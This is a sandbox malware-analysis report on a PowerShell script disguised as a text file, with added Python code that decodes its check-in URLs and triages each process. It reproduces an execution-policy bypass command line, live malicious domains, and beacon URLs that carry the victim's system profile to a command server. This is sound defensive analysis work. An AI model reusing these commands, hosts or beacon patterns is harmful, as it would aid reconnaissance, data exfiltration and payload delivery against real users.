File name: _4b98604bc283291e7573925c9f5656b2713c7840b6d0daa8cec029b25c04af4c.txt

Full analysis: https://app.any.run/tasks/0ea2d35b-d054-421e-a161-3d89fa10a58d
Verdict: Malicious activity
Analysis date: March 13, 2026, 07:08:23
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: evasion, anti-evasion, susp-powershell
Indicators:
MIME: text/plain
File info: ASCII text
MD5: 11EB0617AB7A4F01D4FCEF5158F906BE
SHA1: 50D0F02B5721BEABFF33F50E7CBB76F6B32B0383
SHA256: 6415263F159D27D7D8873F1C62BC31518D9C1E33CE40EC809CAE8F3DA05633F1
SSDEEP: 3:uKNnKTfBzfN7QVQn:Fbun

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Enumerates installed antivirus status via Win32_AntivirusProduct (SCRIPT)

      • powershell.exe (PID: 8196)
    • Enumerates physical memory (Win32_PhysicalMemory) (SCRIPT)

      • powershell.exe (PID: 8196)
    • Get Video Controller Information (POWERSHELL)

      • powershell.exe (PID: 8196)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 8196)
  • SUSPICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 8196)
    • The process executes Powershell scripts

      • powershell.exe (PID: 8196)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 8196)
    • Converts a string into array of characters (POWERSHELL)

      • powershell.exe (PID: 8196)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 8196)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 8196)
    • Checks for external IP

      • svchost.exe (PID: 2292)
      • powershell.exe (PID: 8196)
    • Checks a user's role membership (POWERSHELL)

      • powershell.exe (PID: 8196)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 8196)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 8196)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 8196)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 8196)
    • Using PowerShell for ZIP File Operations

      • powershell.exe (PID: 8196)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 8196)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 8196)
    • User-Agent configuration (POWERSHELL)

      • powershell.exe (PID: 8196)
No Malware configuration.
No data.
Total processes: 141
Monitored processes: 4
Malicious processes: 1
Suspicious processes: 0

Behavior graph

Processes in graph: powershell.exe, conhost.exe (no specs), svchost.exe, slui.exe

Process information

PID: 2292
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Host Process for Windows Services
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll

PID: 7164
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID: 7664
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll

PID: 8196
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\_4b98604bc283291e7573925c9f5656b2713c7840b6d0daa8cec029b25c04af4c.txt.ps1
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
Total events: 9 532
Read events: 9 532
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 5
Text files: 5
Unknown types: 0

Dropped files

Columns: PID, process | filename | type, with hashes on the following lines.

PID 8196, powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary
  MD5: DD8013AA1E017551C8297C938D749457
  SHA256: 4ECAC03724F63694C909648584073004EC3FC00F1B5C920EA73273C0F9D42FA2
PID 8196, powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L7JCUSHT66HI1SKLHLXX.temp | binary
  MD5: DD8013AA1E017551C8297C938D749457
  SHA256: 4ECAC03724F63694C909648584073004EC3FC00F1B5C920EA73273C0F9D42FA2
PID 8196, powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mgfag22e.laq.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 8196, powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1e6e48.TMP | binary
  MD5: 00A03B286E6E0EBFF8D9C492365D5EC2
  SHA256: 4DBFC417D053BA6867308671F1C61F4DCAFC61F058D4044DB532DA6D3BDE3615
PID 8196, powershell.exe | C:\Users\admin\AppData\Local\Temp\pvdb_jrkfap_m_ptzou_a.zip.tmp | html
  MD5: BFA8E3F29ECE88EC95198F8E9C7D0302
  SHA256: F50BC5724E4668070D4B2D3B81A793483D4325D03C079C0080CFB9943EA80E01
PID 8196, powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0ty0myqf.bqr.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 8196, powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
  MD5: FD41E4F2B277D3E401D1D375C92A1DE1
  SHA256: B69D61C3F15DE3FA71393FF4D1E427E82B909A0AE6519006AF0AD0580CF97EF4
PID 8196, powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_erpecnja.mik.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 8196, powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_g2oi1kzk.tce.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID 8196, powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary
  MD5: 7A18FE12596711D455CBBC37C25F39A7
  SHA256: FDDD8958E4F4E09E77E3B1B5F9C87027C6C5409A44BA129931239F71329A19A0
HTTP(S) requests: 30
TCP/UDP connections: 30
DNS requests: 15
Threats: 24

HTTP requests

Columns: PID process | method, HTTP code | IP:port | CN | type | size | reputation, with the URL on the following line. Fields the source does not show for a row are left out.

8196 powershell.exe | GET 200 | 34.160.111.145:443 | CN: US | binary | 12 b | unknown
  https://ifconfig.me/ip
GET 200 | 104.16.124.96:443 | CN: US | 278 b
  https://www.cloudflare.com/cdn-cgi/trace
GET 200 | 185.80.91.86:443 | CN: CH
  https://yuwibkqnaq.com/4Hxlb5hKzp0S9QL9-2RNPa4cFwLJa2c05DqVgeYo5aQ?id=01c32648-afb7-48ef-995f-23a471008f35&s=check_system_ok&user=admin&pc=DESKTOP-JGLLJLD&cwd=C%3A%5CUsers%5Cadmin%5CAppData%5CLocal%5CTemp&osver=Microsoft%20Windows%20NT%2010.0.19045.0&osname=Microsoft%20Windows%2010%20Pro&pcmodel=DELL&pcmanuf=DELL&psv=5.1.19041.4046&admin=False&avinfo=Windows%20Defender&cpu=AMD%20Ryzen%205%203500%206-Core%20Processor&ram=6%20GB&gpu=Microsoft%20Basic%20Display%20Adapter&domain=DESKTOP-JGLLJLD&arch=x64&tz=Eastern%20Standard%20Time&noise=3937
8196 powershell.exe | GET 200 | 104.16.124.96:443 | CN: US | text | 278 b | unknown
  https://www.cloudflare.com/cdn-cgi/trace
GET 200 | 116.202.222.249:443 | CN: IN | html | 1.74 Kb | unknown
  https://sabrineme.com/asfixsoftwaredev.zip
6768 MoUsoCoreWorker.exe | GET 200 | 2.16.164.49:80 | CN: NL | binary | 825 b | whitelisted
  http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
8196 powershell.exe | GET 200 | 185.80.91.86:443 | CN: RU | html | 1.74 Kb | unknown
  https://yuwibkqnaq.com/4Hxlb5hKzp0S9QL9-2RNPa4cFwLJa2c05DqVgeYo5aQ?id=01c32648-afb7-48ef-995f-23a471008f35&s=download_fail&user=admin&pc=DESKTOP-JGLLJLD&cwd=C%3A%5CUsers%5Cadmin%5CAppData%5CLocal%5CTemp&osver=Microsoft%20Windows%20NT%2010.0.19045.0&osname=Microsoft%20Windows%2010%20Pro&pcmodel=DELL&pcmanuf=DELL&psv=5.1.19041.4046&admin=False&avinfo=Windows%20Defender&cpu=AMD%20Ryzen%205%203500%206-Core%20Processor&ram=6%20GB&gpu=Microsoft%20Basic%20Display%20Adapter&domain=DESKTOP-JGLLJLD&arch=x64&tz=Eastern%20Standard%20Time&noise=71688&msg=FileTooSmall
GET 200 | 2.16.164.49:80 | CN: NL | binary | 825 b | whitelisted
  http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
8196 powershell.exe | GET 200 | 185.80.91.86:443 | CN: RU | 1.74 Kb | unknown
  https://yuwibkqnaq.com/4Hxlb5hKzp0S9QL9-2RNPa4cFwLJa2c05DqVgeYo5aQ?id=01c32648-afb7-48ef-995f-23a471008f35&s=check_system_ok&user=admin&pc=DESKTOP-JGLLJLD&cwd=C%3A%5CUsers%5Cadmin%5CAppData%5CLocal%5CTemp&osver=Microsoft%20Windows%20NT%2010.0.19045.0&osname=Microsoft%20Windows%2010%20Pro&pcmodel=DELL&pcmanuf=DELL&psv=5.1.19041.4046&admin=False&avinfo=Windows%20Defender&cpu=AMD%20Ryzen%205%203500%206-Core%20Processor&ram=6%20GB&gpu=Microsoft%20Basic%20Display%20Adapter&domain=DESKTOP-JGLLJLD&arch=x64&tz=Eastern%20Standard%20Time&noise=3937
8196 powershell.exe | GET 200 | 116.202.222.249:443 | CN: DE | 1.74 Kb | unknown
  https://sabrineme.com/asfixsoftwaredev.zip
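The two requests to yuwibkqnaq.com above carry the victim's host profile in the query string and differ only in the stage field (s=check_system_ok, then s=download_fail with msg=FileTooSmall after the .zip fetch came back as HTML). The script below is an editor's example added to this page, not code from the ANY.RUN report or from the sample. It decodes both URLs exactly as copied from the table, using only the Python standard library, separates the stable part (host, path token, the id GUID that is identical in both requests) from the per-host profile, and diffs the two beacons to show what the script reported back. Reading s as a stage name and msg as an error string is an interpretation taken from the values themselves.

```python
"""Decode the yuwibkqnaq.com check-in beacons from the HTTP table (editor's example)."""
from urllib.parse import urlsplit, parse_qs

# Both URLs copied verbatim from the report (PID 8196, powershell.exe).
BEACON_CHECK_OK = (
    "https://yuwibkqnaq.com/4Hxlb5hKzp0S9QL9-2RNPa4cFwLJa2c05DqVgeYo5aQ"
    "?id=01c32648-afb7-48ef-995f-23a471008f35&s=check_system_ok&user=admin&pc=DESKTOP-JGLLJLD"
    "&cwd=C%3A%5CUsers%5Cadmin%5CAppData%5CLocal%5CTemp&osver=Microsoft%20Windows%20NT%2010.0.19045.0"
    "&osname=Microsoft%20Windows%2010%20Pro&pcmodel=DELL&pcmanuf=DELL&psv=5.1.19041.4046&admin=False"
    "&avinfo=Windows%20Defender&cpu=AMD%20Ryzen%205%203500%206-Core%20Processor&ram=6%20GB"
    "&gpu=Microsoft%20Basic%20Display%20Adapter&domain=DESKTOP-JGLLJLD&arch=x64"
    "&tz=Eastern%20Standard%20Time&noise=3937"
)
BEACON_DL_FAIL = (
    "https://yuwibkqnaq.com/4Hxlb5hKzp0S9QL9-2RNPa4cFwLJa2c05DqVgeYo5aQ"
    "?id=01c32648-afb7-48ef-995f-23a471008f35&s=download_fail&user=admin&pc=DESKTOP-JGLLJLD"
    "&cwd=C%3A%5CUsers%5Cadmin%5CAppData%5CLocal%5CTemp&osver=Microsoft%20Windows%20NT%2010.0.19045.0"
    "&osname=Microsoft%20Windows%2010%20Pro&pcmodel=DELL&pcmanuf=DELL&psv=5.1.19041.4046&admin=False"
    "&avinfo=Windows%20Defender&cpu=AMD%20Ryzen%205%203500%206-Core%20Processor&ram=6%20GB"
    "&gpu=Microsoft%20Basic%20Display%20Adapter&domain=DESKTOP-JGLLJLD&arch=x64"
    "&tz=Eastern%20Standard%20Time&noise=71688&msg=FileTooSmall"
)

# Query keys that describe the victim host rather than the beacon itself (names as the sample uses them).
PROFILE_KEYS = ("user", "pc", "domain", "cwd", "osver", "osname", "psv", "admin", "avinfo",
                "cpu", "ram", "gpu", "arch", "tz", "pcmodel", "pcmanuf")


def parse_beacon(url):
    """Split a beacon URL into its stable part (host, path token, id) and the decoded query fields."""
    parts = urlsplit(url)
    # parse_qs percent-decodes values, so %5C becomes a backslash and %20 a space.
    fields = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return {
        "host": parts.hostname,
        "path": parts.path,            # the long token is the same in every request
        "id": fields.get("id"),        # GUID, identical in both beacons
        "stage": fields.get("s"),      # check_system_ok / download_fail
        "error": fields.get("msg"),    # only present on the failure beacon
        "profile": {k: fields[k] for k in PROFILE_KEYS if k in fields},
        "fields": fields,
    }


def diff_beacons(a, b):
    """Sorted list of query keys whose value differs (added, removed or changed) between two beacons."""
    fa, fb = a["fields"], b["fields"]
    return sorted(k for k in set(fa) | set(fb) if fa.get(k) != fb.get(k))


def ioc_line(beacon):
    """Host-independent string to search for in proxy logs: host + path token + id."""
    return f'{beacon["host"]}{beacon["path"]}?id={beacon["id"]}'


if __name__ == "__main__":
    ok, fail = parse_beacon(BEACON_CHECK_OK), parse_beacon(BEACON_DL_FAIL)
    print("IOC:", ioc_line(ok))
    print("profile exfiltrated:", ok["profile"])
    print("changed between beacons:", diff_beacons(ok, fail), "error:", fail["error"])
```

Everything the script learned about the host (user, hostname, OS build, PowerShell version, whether it ran elevated, the AV product, CPU, RAM, GPU, time zone) goes out in the first request, before any payload is fetched; the only things that change between the two beacons are the stage, the noise value and the added msg, so the path token plus id is the part worth hunting for.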

Connections

Columns: PID process | IP:port | domain | ASN | CN | reputation. Fields the source does not show for a row are left out.

40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
4 System | 192.168.100.255:137 | Not routed | whitelisted
4 System | 192.168.100.255:138 | Not routed | whitelisted
6768 MoUsoCoreWorker.exe | 2.16.164.49:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted
2.16.164.49:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted
5516 svchost.exe | 2.16.164.49:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted
6768 MoUsoCoreWorker.exe | 23.52.181.212:80 | www.microsoft.com | AKAMAI-AS | US | whitelisted
5516 svchost.exe | 23.52.181.212:80 | www.microsoft.com | AKAMAI-AS | US | whitelisted
23.52.181.212:80 | www.microsoft.com | AKAMAI-AS | US | whitelisted
51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.104.136.2
whitelisted
google.com
  • 142.251.36.110
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.120
  • 2.19.11.105
  • 2.19.11.120
whitelisted
www.microsoft.com
  • 23.52.181.212
  • 88.221.169.152
whitelisted
api.github.com
  • 140.82.121.5
whitelisted
httpbin.org
  • 35.174.69.157
  • 3.94.136.222
  • 54.85.12.145
  • 50.17.231.182
  • 34.195.100.32
  • 44.199.137.203
  • 34.230.126.118
  • 54.197.177.21
unknown
ifconfig.me
  • 34.160.111.145
whitelisted
www.cloudflare.com
  • 104.16.124.96
  • 104.16.123.96
whitelisted
yuwibkqnaq.com
  • 185.80.91.86
unknown
sabrineme.com
  • 116.202.222.249
malicious

Threats

Columns: PID process | class | message. Fields the source does not show for a row are left out.

Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
8196 powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
2292 svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Lookup Domain (ifconfig .me)
8196 powershell.exe | Misc activity | ET INFO Observed External IP Lookup Domain (ifconfig .me) in TLS SNI
2292 svchost.exe | Misc activity | ET INFO External IP Lookup Domain (ifconfig .me) in DNS Lookup
8196 powershell.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup SSL/TLS Certificate (ifconfig .me)
8196 powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain (ifconfig .me)
Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
No debug info
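Read together, the process table, the HTTP table and the threat alerts put the whole chain on one process, PID 8196: an execution-policy bypass (-ep bypass) on a double-extension script (.txt.ps1), two external-IP lookups (ifconfig.me, cloudflare.com/cdn-cgi/trace), a profile beacon to yuwibkqnaq.com, a fetch of sabrineme.com/asfixsoftwaredev.zip that returned 1.74 Kb of HTML, and a download_fail beacon with msg=FileTooSmall. The svchost.exe (PID 2292) hits on the ifconfig.me alerts are the Dnscache service (its command line carries -s Dnscache) resolving the name on PowerShell's behalf, not a second infected process, and the __PSScriptPolicyTest_* drops are PowerShell's own start-up probe for script enforcement and carry no signal. The script below is an editor's example, not part of the report or the sample: it encodes that correlation as a per-PID triage over events rebuilt from the tables above. The lookup-host set and the profile-key set are taken from this report only; response sizes are approximated from "1.74 Kb", the beacon URLs are rebuilt with urlencode from the profile fields rather than pasted, and the MoUsoCoreWorker.exe command line is a placeholder because the report does not show it.

```python
"""Per-process triage over events rebuilt from this report's tables (editor's example)."""
import re
from urllib.parse import urlsplit, parse_qs, urlencode

# External-IP lookup services contacted in this run (taken from the DNS table above).
EXT_IP_LOOKUP_HOSTS = {"ifconfig.me", "www.cloudflare.com", "httpbin.org"}
# Query keys the beacon used to carry the host profile (from the yuwibkqnaq.com URLs above).
PROFILE_KEYS = {"user", "pc", "domain", "osver", "osname", "psv", "admin", "avinfo",
                "cpu", "ram", "gpu", "arch", "tz"}
# -ep, -ex and -exec are accepted prefixes of -ExecutionPolicy.
EP_BYPASS = re.compile(r"(?i)(?:^|\s)-(?:ep|ex|exec|executionpolicy)\s+bypass\b")
DOUBLE_EXT = re.compile(r"(?i)\.(?:txt|pdf|docx?|xlsx?|jpe?g|png)\.ps1\b")
ARCHIVE_EXT = re.compile(r"(?i)\.(?:zip|7z|rar|exe|dll)$")

# Process table as shown in the report; MoUsoCoreWorker.exe's command line is not in the report.
PROCESSES = {
    8196: '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -ep bypass '
          'C:\\Users\\admin\\Desktop\\_4b98604bc283291e7573925c9f5656b2713c7840b6d0daa8cec029b25c04af4c.txt.ps1',
    2292: "C:\\WINDOWS\\system32\\svchost.exe -k NetworkService -p -s Dnscache",
    6768: "MoUsoCoreWorker.exe",  # placeholder: command line not shown in the report
}

# Host profile from the beacon URLs; the beacon is rebuilt with urlencode rather than pasted.
PROFILE = {"id": "01c32648-afb7-48ef-995f-23a471008f35", "user": "admin", "pc": "DESKTOP-JGLLJLD",
           "osver": "Microsoft Windows NT 10.0.19045.0", "osname": "Microsoft Windows 10 Pro",
           "psv": "5.1.19041.4046", "admin": "False", "avinfo": "Windows Defender",
           "cpu": "AMD Ryzen 5 3500 6-Core Processor", "ram": "6 GB",
           "gpu": "Microsoft Basic Display Adapter", "domain": "DESKTOP-JGLLJLD",
           "arch": "x64", "tz": "Eastern Standard Time"}
BEACON_BASE = "https://yuwibkqnaq.com/4Hxlb5hKzp0S9QL9-2RNPa4cFwLJa2c05DqVgeYo5aQ"


def beacon(stage, **extra):
    """Rebuild a check-in URL for the given stage, e.g. beacon('download_fail', msg='FileTooSmall')."""
    return BEACON_BASE + "?" + urlencode({**PROFILE, "s": stage, **extra})


# HTTP table in report order: (pid, url, response type, size in bytes; "1.74 Kb" approximated as 1782).
HTTP = [
    (8196, "https://ifconfig.me/ip", "binary", 12),
    (8196, "https://www.cloudflare.com/cdn-cgi/trace", "text", 278),
    (8196, beacon("check_system_ok", noise=3937), "html", 1782),
    (8196, "https://sabrineme.com/asfixsoftwaredev.zip", "html", 1782),
    (8196, beacon("download_fail", noise=71688, msg="FileTooSmall"), "html", 1782),
    (6768, "http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl", "binary", 825),
]


def triage(pid, processes=PROCESSES, http=HTTP, min_profile_keys=5):
    """Return the sorted findings for one PID; an empty list means nothing in these tables implicates it."""
    findings = set()
    cmd = processes.get(pid, "")
    if EP_BYPASS.search(cmd):
        findings.add("execution_policy_bypass")
    if DOUBLE_EXT.search(cmd):
        findings.add("double_extension_script")
    for _, url, rtype, size in (e for e in http if e[0] == pid):
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        query = parse_qs(parts.query)
        if host in EXT_IP_LOOKUP_HOSTS:
            findings.add("external_ip_lookup")
        elif len(PROFILE_KEYS & set(query)) >= min_profile_keys:
            findings.add("host_profile_beacon")
            if "msg" in query:                       # the sample reports its own errors to the C2
                findings.add("c2_error_report:" + query["msg"][0])
        # A request for an archive that comes back as HTML (or tiny) is a dead or parked payload URL.
        if ARCHIVE_EXT.search(parts.path) and (rtype == "html" or size < 4096):
            findings.add("payload_fetch_returned_" + rtype)
    return sorted(findings)


def triage_all(processes=PROCESSES, http=HTTP):
    """Map every PID seen in either table to its findings, dropping PIDs with none."""
    pids = set(processes) | {e[0] for e in http}
    return {pid: f for pid in sorted(pids) if (f := triage(pid, processes, http))}


if __name__ == "__main__":
    for pid, f in triage_all().items():
        print(pid, f)
```

Keying on the command line plus the network sequence, rather than on the dropped files, keeps the benign PowerShell start-up artifacts and the Dnscache resolver out of the verdict; only PID 8196 comes back with findings, and the payload_fetch_returned_html finding explains the FileTooSmall error the sample sent home.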